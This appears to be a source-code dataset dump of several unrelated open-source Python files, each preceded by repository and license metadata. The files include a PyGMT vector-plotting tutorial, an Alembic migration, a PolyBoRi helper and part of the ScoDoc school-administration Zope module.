elapsed_time = time.time() - start_time
response['elapsedTime'] = elapsed_time
self.RenderJson(response)
# If 'expected' errors occur (specifically dealing with SQL problems),
# return JSON with descriptive text so that we can give the user a
# constructive error message.
# TODO: Formalize error reporting/handling across the application.
except (big_query_client.BigQueryError, big_query_result_pivot.DuplicateValueError,
ValueError, KeyError, SecurityError) as err:
logging.error(str(err))
self.RenderJson({'error': str(err)})
except MySQLdb.OperationalError as err:
self.RenderJson({'error': 'MySQLdb error %s' % str(err)})
except (google.appengine.runtime.DeadlineExceededError,
apiproxy_errors.DeadlineExceededError,
urlfetch_errors.DeadlineExceededError):
self.RenderText(text=ERROR_TIMEOUT, status=408)
def get(self):
"""Request handler for GET operations."""
self.post()
# Main WSGI app as specified in app.yaml
app = webapp2.WSGIApplication(
[('/data/fields', FieldDataHandler),
('/data/metadata', MetadataDataHandler),
('/data/sql', SqlDataHandler)])
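# Request sketch for the SQL endpoint above; the field values are
# illustrative, and the payload shape follows the SqlDataHandler docstring:
#
#   POST /data/sql
#   {"id": "widget-1", "dashboard_id": "dashboard-1",
#    "datasource": {"query": "SELECT foo FROM bar",
#                   "config": {"results": {"pivot": false}}}}
#
# "id" and "dashboard_id" are required when custom queries are not granted
# to the public, since they are used to check the query against the stored
# dashboard.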
|
apache-2.0
| -780,532,374,467,009,900 | 32.826087 | 87 | 0.685274 | false |
GenericMappingTools/gmt-python
|
examples/tutorials/vectors.py
|
1
|
13414
|
"""
Plotting vectors
================
Plotting vectors is handled by :meth:`pygmt.Figure.plot`.
"""
# sphinx_gallery_thumbnail_number = 6
import numpy as np
import pygmt
########################################################################################
# Plot Cartesian Vectors
# ----------------------
#
# Create a simple Cartesian vector using a starting point through
# ``x``, ``y``, and ``direction`` parameters.
# On the shown figure, the plot is projected on a 10cm X 10cm region,
# which is specified by the ``projection`` parameter.
# The direction is specified
# by a list of two 1d arrays structured as ``[[angle_in_degrees], [length]]``.
# The angle is measured in degrees and moves counter-clockwise from the
# horizontal.
# The length of the vector uses centimeters by default but
# could be changed using :meth:`pygmt.config`
# (Check the next examples for unit changes).
#
# Notice that the ``v`` in the ``style`` parameter stands for
# vector; it distinguishes it from regular lines and allows for
# different customization. ``0c`` is used to specify the size
# of the arrow head which explains why there is no arrow on either
# side of the vector.
fig = pygmt.Figure()
fig.plot(
region=[0, 10, 0, 10],
projection="X10c/10c",
frame="ag",
x=2,
y=8,
style="v0c",
direction=[[-45], [6]],
)
fig.show()
########################################################################################
# In this example, we apply the same concept shown previously to plot multiple
# vectors. Notice that instead of passing an int/float to ``x`` and ``y``, a
# list of all x and y coordinates will be passed. Similarly, the length of the
# direction list will increase accordingly.
#
# Additionally, we change the style of the vector to include a red
# arrow head at the end (**+e**) of the vector and increase the
# thickness (``pen="2p"``) of the vector stem. A list of different
# styling attributes can be found in
# :doc:`Vector heads and tails </gallery/lines/vector_heads_tails>`.
fig = pygmt.Figure()
fig.plot(
region=[0, 10, 0, 10],
projection="X10c/10c",
frame="ag",
x=[2, 4],
y=[8, 1],
style="v0.6c+e",
direction=[[-45, 23], [6, 3]],
pen="2p",
color="red3",
)
fig.show()
########################################################################################
# The default unit of vector length is centimeters;
# however, this can be changed to inches or points. Note that, in PyGMT,
# one point is defined as 1/72 inch.
#
# In this example, the graphed region is 5in X 5in, but
# the length of the first vector is still graphed in centimeters.
# Using ``pygmt.config(PROJ_LENGTH_UNIT="i")``, the default unit
# can be changed to inches in the second plotted vector.
fig = pygmt.Figure()
# Vector 1 with default unit as cm
fig.plot(
region=[0, 10, 0, 10],
projection="X5i/5i",
frame="ag",
x=2,
y=8,
style="v1c+e",
direction=[[0], [3]],
pen="2p",
color="red3",
)
# Vector 2 after changing default unit to inch
with pygmt.config(PROJ_LENGTH_UNIT="i"):
fig.plot(
x=2,
y=7,
direction=[[0], [3]],
style="v1c+e",
pen="2p",
color="red3",
)
fig.show()
########################################################################################
# Vectors can also be plotted by including all the information
# about a vector in a single list. However, this requires creating
# a 2D list or numpy array containing all vectors.
# Each vector list contains the information structured as:
# ``[x_start, y_start, direction_degrees, length]``.
#
# If this approach is chosen, the ``data`` parameter must be
# used instead of ``x``, ``y`` and ``direction``.
# Create a list of lists that include each vector information
vectors = [[2, 3, 45, 4]]
fig = pygmt.Figure()
fig.plot(
region=[0, 10, 0, 10],
projection="X10c/10c",
frame="ag",
data=vectors,
style="v0.6c+e",
pen="2p",
color="red3",
)
fig.show()
########################################################################################
# Using the functionality mentioned in the previous example,
# multiple vectors can be plotted at the same time. Another
# vector could simply be added to the 2D list or numpy
# array object and passed using the ``data`` parameter.
# Vector specifications structured as: [x_start, y_start, direction_degrees, length]
vector_1 = [2, 3, 45, 4]
vector_2 = [7.5, 8.3, -120.5, 7.2]
# Create a list of lists that include each vector information
vectors = [vector_1, vector_2]
# Vectors structure: [[2, 3, 45, 4], [7.5, 8.3, -120.5, 7.2]]
fig = pygmt.Figure()
fig.plot(
region=[0, 10, 0, 10],
projection="X10c/10c",
frame="ag",
data=vectors,
style="v0.6c+e",
pen="2p",
color="red3",
)
fig.show()
########################################################################################
# In this example, Cartesian vectors are plotted over a Mercator
# projection of the continental US. The x values represent the
# longitude and y values represent the latitude where the vector starts.
#
# This example also shows some of the styles a vector supports.
# The beginning point of the vector (**+b**)
# should take the shape of a circle (**c**). Similarly, the end
# point of the vector (**+e**) should have an arrow shape (**a**)
# (to draw a plain arrow, use **A** instead). Lastly, the **+a**
# specifies the angle of the vector head apex (30 degrees in
# this example).
# Create a plot with coast, Mercator projection (M) over the continental US
fig = pygmt.Figure()
fig.coast(
region=[-127, -64, 24, 53],
projection="M10c",
frame="ag",
borders=1,
shorelines="0.25p,black",
area_thresh=4000,
land="grey",
water="lightblue",
)
# Plot a vector using the x, y, direction parameters
style = "v0.4c+bc+ea+a30"
fig.plot(
x=-110,
y=40,
style=style,
direction=[[-25], [3]],
pen="1p",
color="red3",
)
# vector specifications structured as: [x_start, y_start, direction_degrees, length]
vector_2 = [-82, 40.5, 138, 2.5]
vector_3 = [-71.2, 45, -115.7, 4]
# Create a list of lists that include each vector information
vectors = [vector_2, vector_3]
# Plot vectors using the data parameter.
fig.plot(
data=vectors,
style=style,
pen="1p",
color="yellow",
)
fig.show()
########################################################################################
# Another example of plotting Cartesian vectors over a coast plot. This time
# a Transverse Mercator projection is used. Additionally, :func:`numpy.linspace`
# is used to create 5 vectors with equal stops.
x = np.linspace(36, 42, 5)  # x values = [36.  37.5 39.  40.5 42. ]
y = np.linspace(39, 39, 5)  # y values = [39. 39. 39. 39. 39.]
direction = np.linspace(-90, -90, 5)  # direction values = [-90. -90. -90. -90. -90.]
length = np.linspace(1.5, 1.5, 5)  # length values = [1.5 1.5 1.5 1.5 1.5]
# Create a plot with coast, Transverse Mercator projection (T) over the
# eastern Mediterranean region
fig = pygmt.Figure()
fig.coast(
region=[20, 50, 30, 45],
projection="T35/10c",
frame=True,
borders=1,
shorelines="0.25p,black",
area_thresh=4000,
land="lightbrown",
water="lightblue",
)
fig.plot(
x=x,
y=y,
style="v0.4c+ea+bc",
direction=[direction, length],
pen="0.6p",
color="red3",
)
fig.show()
########################################################################################
# Plot Circular Vectors
# ---------------------
#
# When plotting circular vectors, all of the information for a single vector is
# to be stored in a list. Each circular vector list is structured as:
# ``[x_start, y_start, radius, degree_start, degree_stop]``. The first two values in
# the vector list represent the origin of the circle that will be plotted.
# The next value is the radius which is represented on the plot in centimeters.
#
# The last two values in the vector list represent the degree at which the plot
# will start and stop. These values are measured counter-clockwise from the horizontal
# axis. In this example, the result shown is the left half of a circle, as the
# plot starts at 90 degrees and goes until 270. Notice that the ``m`` in the
# ``style`` parameter stands for circular vectors.
fig = pygmt.Figure()
circular_vector_1 = [0, 0, 2, 90, 270]
data = [circular_vector_1]
fig.plot(
region=[-5, 5, -5, 5],
projection="X10c",
frame="ag",
data=data,
style="m0.5c+ea",
pen="2p",
color="red3",
)
# Another example using np.array()
circular_vector_2 = [0, 0, 4, -90, 90]
data = np.array([circular_vector_2])
fig.plot(
data=data,
style="m0.5c+ea",
pen="2p",
color="red3",
)
fig.show()
########################################################################################
# When plotting multiple circular vectors, a two-dimensional array or numpy
# array object should be passed as the ``data`` parameter. In this example,
# :func:`numpy.column_stack` is used to generate this two-dimensional array.
# Other numpy objects are used to generate linear values for the ``radius``
# parameter and evenly spaced values for the ``degree_stop`` parameter
# discussed in the previous example. This is why each vector has a different
# appearance on the projection.
vector_num = 5
radius = 3 - (0.5 * np.arange(0, vector_num))
startdir = np.full(vector_num, 90)
stopdir = 180 + (50 * np.arange(0, vector_num))
data = np.column_stack(
[np.full(vector_num, 0), np.full(vector_num, 0), radius, startdir, stopdir]
)
fig = pygmt.Figure()
fig.plot(
region=[-5, 5, -5, 5],
projection="X10c",
frame="ag",
data=data,
style="m0.5c+ea",
pen="2p",
color="red3",
)
fig.show()
########################################################################################
# Much like when plotting Cartesian vectors, the default unit used is centimeters.
# When this is changed to inches, the size of the plot appears larger when the
# projection units do not change. Below is an example of two circular vectors.
# One is plotted using the default unit, and the second is plotted using inches.
# Despite using the same list to plot the vectors, a different measurement unit
# causes one to be larger than the other.
circular_vector = [6, 5, 1, 90, 270]
fig = pygmt.Figure()
fig.plot(
region=[0, 10, 0, 10],
projection="X10c",
frame="ag",
data=[circular_vector],
style="m0.5c+ea",
pen="2p",
color="red3",
)
with pygmt.config(PROJ_LENGTH_UNIT="i"):
fig.plot(
data=[circular_vector],
style="m0.5c+ea",
pen="2p",
color="red3",
)
fig.show()
########################################################################################
# Plot Geographic Vectors
# -----------------------
# On this map,
# ``point_1`` and ``point_2`` are coordinate pairs used to set the
# start and end points of the geographic vector.
# The geographical vector is going from Idaho to
# Chicago. To style geographic
# vectors, use ``=`` at the beginning of the ``style`` parameter.
# Other styling features such as vector stem thickness and head color
# can be passed into the ``pen`` and ``color`` parameters.
#
# Note that the **+s** is added to use a startpoint and an endpoint
# to represent the vector instead of input angle and length.
point_1 = [-114.7420, 44.0682]
point_2 = [-87.6298, 41.8781]
data = np.array([point_1 + point_2])
fig = pygmt.Figure()
fig.coast(
region=[-127, -64, 24, 53],
projection="M10c",
frame=True,
borders=1,
shorelines="0.25p,black",
area_thresh=4000,
)
fig.plot(
data=data,
style="=0.5c+ea+s",
pen="2p",
color="red3",
)
fig.show()
########################################################################################
# Using the same technique shown in the previous example,
# multiple vectors can be plotted in a chain where the endpoint
# of one is the starting point of another. This can be done
# by adding the coordinate lists together to create this structure:
# ``[[start_latitude, start_longitude, end_latitude, end_longitude]]``.
# Each list within the 2D list contains the start and end information
# for each vector.
# Coordinate pairs for all the locations used
ME = [-69.4455, 45.2538]
CHI = [-87.6298, 41.8781]
SEA = [-122.3321, 47.6062]
NO = [-90.0715, 29.9511]
KC = [-94.5786, 39.0997]
CA = [-119.4179, 36.7783]
# Add array to piece together the vectors
data = [ME + CHI, CHI + SEA, SEA + KC, KC + NO, NO + CA]
fig = pygmt.Figure()
fig.coast(
region=[-127, -64, 24, 53],
projection="M10c",
frame=True,
borders=1,
shorelines="0.25p,black",
area_thresh=4000,
)
fig.plot(
data=data,
style="=0.5c+ea+s",
pen="2p",
color="red3",
)
fig.show()
################################################################################
# This example plots vectors over a Mercator projection. The starting point of
# every vector is SA (South Africa), and the vectors go to four different
# locations.
SA = [22.9375, -30.5595]
EUR = [15.2551, 54.5260]
ME = [-69.4455, 45.2538]
AS = [100.6197, 34.0479]
NM = [-105.8701, 34.5199]
data = np.array([SA + EUR, SA + ME, SA + AS, SA + NM])
fig = pygmt.Figure()
fig.coast(
region=[-180, 180, -80, 80],
projection="M0/0/12c",
frame="afg",
land="lightbrown",
water="lightblue",
)
fig.plot(
data=data,
style="=0.5c+ea+s",
pen="2p",
color="red3",
)
fig.show()
|
bsd-3-clause
| 3,405,470,525,067,376,000 | 29.27991 | 96 | 0.601387 | false |
fredmorcos/attic
|
projects/plantmaker/archive/20100707/src/extra/schedule.py
|
1
|
2899
|
from printer import pretty, GREEN, YELLOW, CYAN
class Schedule(object):
def __init__(self):
self.schedule = []
self.startTimes = []
self.finishTimes = []
self.report = {}
self.fitness = None
self.startTime = (2,0,0)
def maxTime(self):
if len(self.schedule) > 0:
maxTime = self.schedule[0][2]
for s in self.schedule:
if s[2] > maxTime:
maxTime = s[2]
for s in self.finishTimes:
if s[1] > maxTime:
maxTime = s[1]
return maxTime
return 0
def minTime(self):
if len(self.schedule) > 0:
minTime = self.schedule[0][2]
for s in self.schedule:
if s[2] < minTime:
minTime = s[2]
for s in self.finishTimes:
if s[1] < minTime:
minTime = s[1]
return minTime
return 0
def getTimeAt(self, t):
		hours = int(t / 3600) + self.startTime[0]
		mins = ((t % 3600) / 60) + self.startTime[1]
		seconds = ((t % 3600) % 60) + self.startTime[2]
if hours < 10:
hours = "0%d" % (hours)
if mins < 10:
mins = "0%d" % (mins)
if seconds < 10:
seconds = "0%d" % (seconds)
return "%2s:%2s:%2s" % (hours , mins, seconds)
def __repr__(self):
res = ""
minTime, maxTime = self.minTime(), self.maxTime()
res += pretty("%10s%10s%5s%15s\n" % ("Time", "Order","", "Machine"), GREEN)
res += pretty("----------------------------------------\n", GREEN)
i = minTime
while i <= maxTime:
for s in self.schedule:
if s[2] == i:
if "kettle" in s[1]:
res += pretty("%10s%10s%10s%5s%15s\n" % (s[2], self.getTimeAt(s[2]), s[0], "->", s[1]), CYAN)
else:
res += "%10s%10s%10s%5s%15s\n" % (s[2], self.getTimeAt(s[2]), s[0], "->", s[1])
for s in self.finishTimes:
if s[1] == i:
res += pretty("%10s%10s%10s finished.\n" % (s[1], self.getTimeAt(s[1]), s[0]), YELLOW)
i += 1
res += pretty("----------------------------------------\n", GREEN)
res += pretty("Fitness: %s\n" % (self.fitness), YELLOW)
res += pretty("----------------------------------------\n", GREEN)
return res
def loadStartTimes(self, plant):
assert len(self.startTimes) == 0
firstMachineName = plant.machines[0].name
for s in self.schedule:
if s[0].currentMachine == "":
if s[1] == firstMachineName:
self.startTimes.append(s)
else:
if s[1] == s[0].currentMachine:
self.startTimes.append(s)
self.schedule = []
self.finishTimes = []
def sort(self, func = lambda a, b: cmp(a[1], b[1])):
self.schedule.sort(func)
def __getitem__(self, key):
return self.schedule[key]
def __setitem__(self, key, value):
self.schedule[key] = value
def __eq__(self, s):
for i in s.startTimes:
for j in self.startTimes:
if i[0] == j[0] and i[1] == j[1]:
if i[2] != j[2]:
return False
return True
def unNormalize(self, normVal):
for s in self.schedule:
s[2] *= normVal
for s in self.finishTimes:
s[1] *= normVal
|
isc
| 3,933,606,255,565,375,000 | 24.429825 | 99 | 0.549845 | false |
all-of-us/raw-data-repository
|
rdr_service/alembic/versions/5a1b1f7b4761_add_columns_to_genomic_member_.py
|
1
|
2128
|
"""add columns to genomic_set_member
Revision ID: 5a1b1f7b4761
Revises: f3fdb9d05ab3
Create Date: 2019-09-17 16:06:00.824574
"""
from alembic import op
import sqlalchemy as sa
import rdr_service.model.utils
from sqlalchemy.dialects import mysql
from rdr_service.participant_enums import PhysicalMeasurementsStatus, QuestionnaireStatus, OrderStatus
from rdr_service.participant_enums import WithdrawalStatus, WithdrawalReason, SuspensionStatus, QuestionnaireDefinitionStatus
from rdr_service.participant_enums import EnrollmentStatus, Race, SampleStatus, OrganizationType, BiobankOrderStatus
from rdr_service.participant_enums import OrderShipmentTrackingStatus, OrderShipmentStatus
from rdr_service.participant_enums import MetricSetType, MetricsKey, GenderIdentity
from rdr_service.model.base import add_table_history_table, drop_table_history_table
from rdr_service.model.code import CodeType
from rdr_service.model.site_enums import SiteStatus, EnrollingStatus, DigitalSchedulingStatus, ObsoleteStatus
# revision identifiers, used by Alembic.
revision = '5a1b1f7b4761'
down_revision = 'f3fdb9d05ab3'
branch_labels = None
depends_on = None
def upgrade(engine_name):
globals()["upgrade_%s" % engine_name]()
def downgrade(engine_name):
globals()["downgrade_%s" % engine_name]()
def upgrade_rdr():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('genomic_set_member', sa.Column('sample_id', sa.String(length=80), nullable=True))
op.add_column('genomic_set_member', sa.Column('sample_type', sa.String(length=50), nullable=True))
# ### end Alembic commands ###
def downgrade_rdr():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('genomic_set_member', 'sample_type')
op.drop_column('genomic_set_member', 'sample_id')
# ### end Alembic commands ###
def upgrade_metrics():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_metrics():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
|
bsd-3-clause
| 2,115,397,206,497,490,700 | 33.322581 | 125 | 0.74765 | false |
ohanar/PolyBoRi
|
pyroot/polybori/intersect.py
|
1
|
1391
|
#
# intersect.py
# PolyBoRi
#
# Created by Michael Brickenstein on 2008-09-24.
# Copyright 2008 The PolyBoRi Team
#
from polybori.gbcore import groebner_basis
from polybori.statistics import used_vars_set
from itertools import chain
def intersect(i, j, **gb_opts):
"""
    This function intersects two ideals. The first ring variable is used as a
    helper variable for this intersection. It is assumed that it doesn't occur
    in the ideals, and that we have an elimination ordering for this variable.
    Both assumptions are checked.
>>> from polybori.frontend import declare_ring
>>> from polybori import Block
>>> r=declare_ring(Block("x", 1000), globals())
>>> x = r.variable
>>> intersect([x(1),x(2)+1],[x(1),x(2)])
[x(1)]
"""
if not i or not j:
return []
uv = used_vars_set(i) * used_vars_set(j)
t = iter(i).next().ring().variable(0)
if uv.reducible_by(t):
raise ValueError, \
"First ring variable has to be reserved as helper variable t"
if not t > uv:
raise ValueError, "need elimination ordering for first ring variable"
gb = groebner_basis(list(chain((t * p for p in i), ((1 + t) * p for p in j
))), **gb_opts)
return [p for p in gb if p.navigation().value() > t.index()]
def _test():
import doctest
doctest.testmod()
if __name__ == "__main__":
_test()
|
gpl-2.0
| 2,140,742,197,082,218,500 | 29.23913 | 110 | 0.632638 | false |
denys-duchier/Scolar
|
ZScoDoc.py
|
1
|
35299
|
# -*- mode: python -*-
# -*- coding: iso8859-15 -*-
##############################################################################
#
# Gestion scolarite IUT
#
# Copyright (c) 2001 - 2013 Emmanuel Viennet. All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Emmanuel Viennet emmanuel.viennet@viennet.net
#
##############################################################################
"""Site ScoDoc pour plusieurs departements:
gestion de l'installation et des creation de départements.
Chaque departement est géré par un ZScolar sous ZScoDoc.
"""
import time, string, glob, re, inspect
import urllib, urllib2, cgi, xml
try: from cStringIO import StringIO
except: from StringIO import StringIO
from zipfile import ZipFile
import os.path, glob
from email.MIMEMultipart import MIMEMultipart
from email.MIMEText import MIMEText
from email.MIMEBase import MIMEBase
from email.Header import Header
from email import Encoders
# Zope modules:
from OFS.SimpleItem import Item # Basic zope object
from OFS.PropertyManager import PropertyManager # provide the 'Properties' tab with the
# 'manage_propertiesForm' method
from OFS.ObjectManager import ObjectManager
from AccessControl.Role import RoleManager # provide the 'Ownership' tab with
# the 'manage_owner' method
from AccessControl import ClassSecurityInfo
import Globals
from Globals import DTMLFile # can use DTML files
from Globals import Persistent
from Globals import INSTANCE_HOME
from Acquisition import Implicit
#
try:
import Products.ZPsycopgDA.DA as ZopeDA
except:
import ZPsycopgDA.DA as ZopeDA # interp.py
from sco_utils import *
from notes_log import log
from ZScoUsers import pwdFascistCheck
class ZScoDoc(ObjectManager,
PropertyManager,
RoleManager,
Item,
Persistent,
Implicit
):
"ZScoDoc object"
meta_type = 'ZScoDoc'
security=ClassSecurityInfo()
file_path = Globals.package_home(globals())
    # This is the list of the methods associated with 'tabs' in the ZMI
    # Be aware that the first in the list is the one shown by default, so if
    # the 'View' tab is the first, you will never see your tabs by clicking
    # on the object.
manage_options = (
( {'label': 'Contents', 'action': 'manage_main'}, )
+ PropertyManager.manage_options # add the 'Properties' tab
+ (
# this line is kept as an example with the files :
# dtml/manage_editZScolarForm.dtml
# html/ZScolar-edit.stx
# {'label': 'Properties', 'action': 'manage_editForm',},
{'label': 'View', 'action': 'index_html'},
)
+ Item.manage_options # add the 'Undo' & 'Owner' tab
+ RoleManager.manage_options # add the 'Security' tab
)
def __init__(self, id, title):
"Initialise a new instance of ZScoDoc"
self.id = id
self.title = title
self.manage_addProperty('admin_password_initialized', '0', 'string')
security.declareProtected(ScoView, 'ScoDocURL')
def ScoDocURL(self): # XXX unused
"base URL for this instance (top level for ScoDoc site)"
return self.absolute_url()
def _check_admin_perm(self, REQUEST):
"""Check if user has permission to add/delete departements
"""
authuser = REQUEST.AUTHENTICATED_USER
if authuser.has_role('manager') or authuser.has_permission(ScoSuperAdmin,self):
return ''
else:
return """<h2>Vous n'avez pas le droit d'accéder à cette page</h2>"""
def _check_users_folder(self, REQUEST=None):
"""Vérifie UserFolder et le crée s'il le faut
"""
try:
udb = self.UsersDB
return '<!-- uf ok -->'
except:
e = self._check_admin_perm(REQUEST)
if not e: # admin permissions:
self.create_users_cnx(REQUEST)
self.create_users_folder(REQUEST)
return '<div class="head_message">Création du connecteur utilisateurs réussie</div>'
else:
return """<div class="head_message">Installation non terminée: connectez vous avec les droits d'administrateur</div>"""
security.declareProtected('View','create_users_folder')
def create_users_folder(self, REQUEST=None):
"""Create Zope user folder
"""
e = self._check_admin_perm(REQUEST)
if e:
return e
if REQUEST is None:
REQUEST = {}
REQUEST.form['pgauth_connection']='UsersDB'
REQUEST.form['pgauth_table']='sco_users'
REQUEST.form['pgauth_usernameColumn']='user_name'
REQUEST.form['pgauth_passwordColumn']='passwd'
REQUEST.form['pgauth_rolesColumn']='roles'
add_method = self.manage_addProduct['OFSP'].manage_addexUserFolder
log('create_users_folder: in %s' % self.id)
return add_method(
authId='pgAuthSource',
propId='nullPropSource',
memberId='nullMemberSource',
groupId='nullGroupSource',
cryptoId='MD51',
# doAuth='1', doProp='1', doMember='1', doGroup='1', allDone='1',
cookie_mode=2,
session_length=500,
not_session_length=0,
REQUEST=REQUEST
)
def _fix_users_folder(self):
"""removes docLogin and docLogout dtml methods from exUserFolder, so that we use ours.
        (called each time by index_html, to fix old ScoDoc installations.)
"""
try:
self.acl_users.manage_delObjects(ids=[ 'docLogin', 'docLogout' ])
except:
pass
# add missing getAuthFailedMessage (bug in exUserFolder ?)
try:
x = self.getAuthFailedMessage
except:
log('adding getAuthFailedMessage to Zope install')
parent = self.aq_parent
from OFS.DTMLMethod import addDTMLMethod
addDTMLMethod(parent, 'getAuthFailedMessage', file='Identification')
security.declareProtected('View','create_users_cnx')
def create_users_cnx(self, REQUEST=None):
"""Create Zope connector to UsersDB
        Note: the connection is hard-coded (SCOUSERS) (database created by the installer)!
        Advanced users will be able to change it afterwards.
"""
        # for now this Zope-db connector is still used by exUserFolder.pgAuthSource
        # (read-only in principle)
oid = 'UsersDB'
log('create_users_cnx: in %s' % self.id)
da = ZopeDA.Connection(
oid, 'Cnx bd utilisateurs',
SCO_DEFAULT_SQL_USERS_CNX,
False,
check=1, tilevel=2, encoding='LATIN1')
self._setObject(oid, da)
security.declareProtected('View', 'change_admin_user')
def change_admin_user(self, password, REQUEST=None):
"""Change password of admin user"""
        # note: checks the role rather than a permission
        # (permissions are not defined at the top level)
if not REQUEST.AUTHENTICATED_USER.has_role('Manager'):
log('user %s is not Manager' % REQUEST.AUTHENTICATED_USER)
log('roles=%s' % REQUEST.AUTHENTICATED_USER.getRolesInContext(self))
raise AccessDenied("vous n'avez pas le droit d'effectuer cette opération")
log("trying to change admin password")
# 1-- check strong password
if pwdFascistCheck(password) != None:
log("refusing weak password")
return REQUEST.RESPONSE.redirect("change_admin_user_form?message=Mot%20de%20passe%20trop%20simple,%20recommencez")
# 2-- change password for admin user
username = 'admin'
acl_users = self.aq_parent.acl_users
user=acl_users.getUser(username)
r = acl_users._changeUser(username, password, password ,user.roles,user.domains)
if not r:
# OK, set property to indicate we changed the password
log('admin password changed successfully')
self.manage_changeProperties(admin_password_initialized='1')
return r or REQUEST.RESPONSE.redirect("index_html")
security.declareProtected('View', 'change_admin_user_form')
def change_admin_user_form(self, message='', REQUEST=None):
"""Form allowing to change the ScoDoc admin password"""
        # note: checks the role rather than a permission
        # (permissions are not defined at the top level)
if not REQUEST.AUTHENTICATED_USER.has_role('Manager'):
raise AccessDenied("vous n'avez pas le droit d'effectuer cette opération")
H = [ self._html_begin %
{ 'page_title' : 'ScoDoc: changement mot de passe',
'encoding' : SCO_ENCODING },
self._top_level_css,
"""</head><body>"""
]
if message:
H.append('<div id="message">%s</div>' % message )
H.append("""<h2>Changement du mot de passe administrateur (utilisateur admin)</h2>
<p>
<form action="change_admin_user" method="post"><table>
<tr><td>Nouveau mot de passe:</td><td><input type="password" size="14" name="password"/></td></tr>
<tr><td>Confirmation: </td><td><input type="password" size="14" name="password2" /></td></tr>
</table>
<input type="submit" value="Changer">
"""
)
H.append("""</body></html>""")
return '\n'.join(H)
security.declareProtected('View','list_depts')
def list_depts(self, REQUEST=None):
"""List departments folders
(returns a list of Zope folders containing a ZScolar instance)
"""
folders = self.objectValues('Folder')
# select folders with Scolarite object:
r = []
for folder in folders:
try:
s = folder.Scolarite
r.append(folder)
except:
pass
return r
security.declareProtected('View','create_dept')
def create_dept(self, REQUEST=None, DeptId='', pass2=False):
"""Creation (ajout) d'un site departement
(instance ZScolar + dossier la contenant)
"""
e = self._check_admin_perm(REQUEST)
if e:
return e
if not DeptId:
raise ValueError('nom de departement invalide')
if not pass2:
            # 1- Create the Dept directory
add_method = self.manage_addProduct['OFSP'].manage_addFolder
add_method( DeptId, title='Site dept. ' + DeptId )
DeptFolder = self[DeptId]
if not pass2:
            # 2- Create the Fotos directory
add_method = DeptFolder.manage_addProduct['OFSP'].manage_addFolder
add_method( 'Fotos', title='Photos identites ' + DeptId )
        # 3- Create the ScoDoc instance
add_method = DeptFolder.manage_addProduct['ScoDoc'].manage_addZScolarForm
return add_method( DeptId, REQUEST=REQUEST )
security.declareProtected('View','delete_dept')
def delete_dept(self, REQUEST=None, DeptId='', force=False):
"""Supprime un departement (de Zope seulement, ne touche pas la BD)
"""
e = self._check_admin_perm(REQUEST)
if e:
return e
if not force and DeptId not in [ x.id for x in self.list_depts() ]:
raise ValueError('nom de departement invalide')
self.manage_delObjects(ids=[ DeptId ])
return '<p>Département ' + DeptId + """ supprimé du serveur web (la base de données n'est pas affectée)!</p><p><a href="%s">Continuer</a></p>""" % REQUEST.URL1
_top_level_css = """
<style type="text/css">
div.maindiv {
margin: 1em;
}
ul.main {
list-style-type: square;
}
ul.main li {
padding-bottom: 2ex;
}
#scodoc_attribution p {
font-size:75%;
}
div.head_message {
margin-top: 2px;
margin-bottom: 0px;
padding: 0.1em;
margin-left: auto;
margin-right: auto;
background-color: #ffff73;
-moz-border-radius: 8px;
-khtml-border-radius: 8px;
border-radius: 8px;
font-family : arial, verdana, sans-serif ;
font-weight: bold;
width: 40%;
text-align: center;
}
#scodoc_admin {
background-color: #EEFFFF;
}
h4 {
padding-top: 20px;
padding-bottom: 0px;
}
#message {
margin-top: 2px;
margin-bottom: 0px;
padding: 0.1em;
margin-left: auto;
margin-right: auto;
background-color: #ffff73;
-moz-border-radius: 8px;
-khtml-border-radius: 8px;
border-radius: 8px;
font-family : arial, verdana, sans-serif ;
font-weight: bold;
width: 40%;
text-align: center;
color: red;
}
.help {
font-style: italic;
color: red;
}
</style>"""
_html_begin = """<?xml version="1.0" encoding="%(encoding)s"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>%(page_title)s</title>
<meta http-equiv="Content-Type" content="text/html; charset=%(encoding)s" />
<meta http-equiv="Content-Style-Type" content="text/css" />
<meta name="LANG" content="fr" />
<meta name="DESCRIPTION" content="ScoDoc" />"""
security.declareProtected('View', 'index_html')
def index_html(self, REQUEST=None, message=None):
"""Top level page for ScoDoc
"""
authuser = REQUEST.AUTHENTICATED_USER
deptList = self.list_depts()
self._fix_users_folder() # fix our exUserFolder
isAdmin = not self._check_admin_perm(REQUEST)
try:
admin_password_initialized = self.admin_password_initialized
except:
admin_password_initialized = '0'
if isAdmin and admin_password_initialized != '1':
REQUEST.RESPONSE.redirect( "ScoDoc/change_admin_user_form?message=Le%20mot%20de%20passe%20administrateur%20doit%20etre%20change%20!")
        # if the URL indicates a department folder, show that department's login page
try:
deptfoldername = REQUEST.URL0.split('ScoDoc')[1].split('/')[1]
if deptfoldername in [ x.id for x in self.list_depts() ]:
return self.index_dept(deptfoldername=deptfoldername, REQUEST=REQUEST)
except:
pass
H = [ self._html_begin %
{ 'page_title' : 'ScoDoc: bienvenue',
'encoding' : SCO_ENCODING },
self._top_level_css,
"""</head><body>""",
CUSTOM_HTML_HEADER_CNX,
self._check_users_folder(REQUEST=REQUEST), # ensure setup is done
self._check_icons_folder(REQUEST=REQUEST) ]
if message:
H.append('<div id="message">%s</div>' % message )
if isAdmin and not message:
H.append('<div id="message">Attention: connecté comme administrateur</div>' )
H.append("""
<div class="maindiv">
<h2>ScoDoc: gestion scolarité</h2>
<p>
Ce site est <font color="red"><b>réservé au personnel autorisé</b></font>.
</p>
""")
if not deptList:
H.append('<em>aucun département existant !</em>')
            # if no dept exists and the user is not admin, offer a link to log in as admin
if not isAdmin:
